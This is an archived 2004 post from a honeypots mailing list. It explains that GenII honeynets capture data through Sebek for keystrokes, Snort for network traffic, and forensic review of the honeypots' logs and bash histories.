Honeypots mailing list archives
Re: sebek data
From: <gconnell () middlebury edu>
Date: 29 Mar 2004 06:40:40 -0000
In-Reply-To: <20040204114011.1798.qmail () web9504 mail yahoo com>
is sebek is the only one data capture tool in a honeynet? can the data captured by be used to do some analysis? is it enough?
In the GenII honeynets (the ones that use sebek) described by the honeynet project, there are quite a few more data capture tools. It's just some of them don't look quite like data capture tools. For instance, each honeypot within the honeynet is itself a data capture tool, as all changes to it are considered malicious. Also, all packets that enter the honeynet are captured by snort and logged, since all data on the honeynet is, once again, considered malicious. Sebek is just one of the "lower level" data capture tools. Sebek: Keystrokes, commands through ssh, etc. Snort: All network data, especially cleartext data, but also including any over-the-network attacks, etc. Honeypots: Forensics on these can show all sorts of fun stuff, especially if the hacker isn't careful. For instance, take a look at the system log and the bash histories. --Cleverduck
Current thread:
- sebek data ansiry fsktm (Feb 05)
- Re: sebek data Edward Balas (Feb 05)
- <Possible follow-ups>
- Re: sebek data gconnell (Mar 28)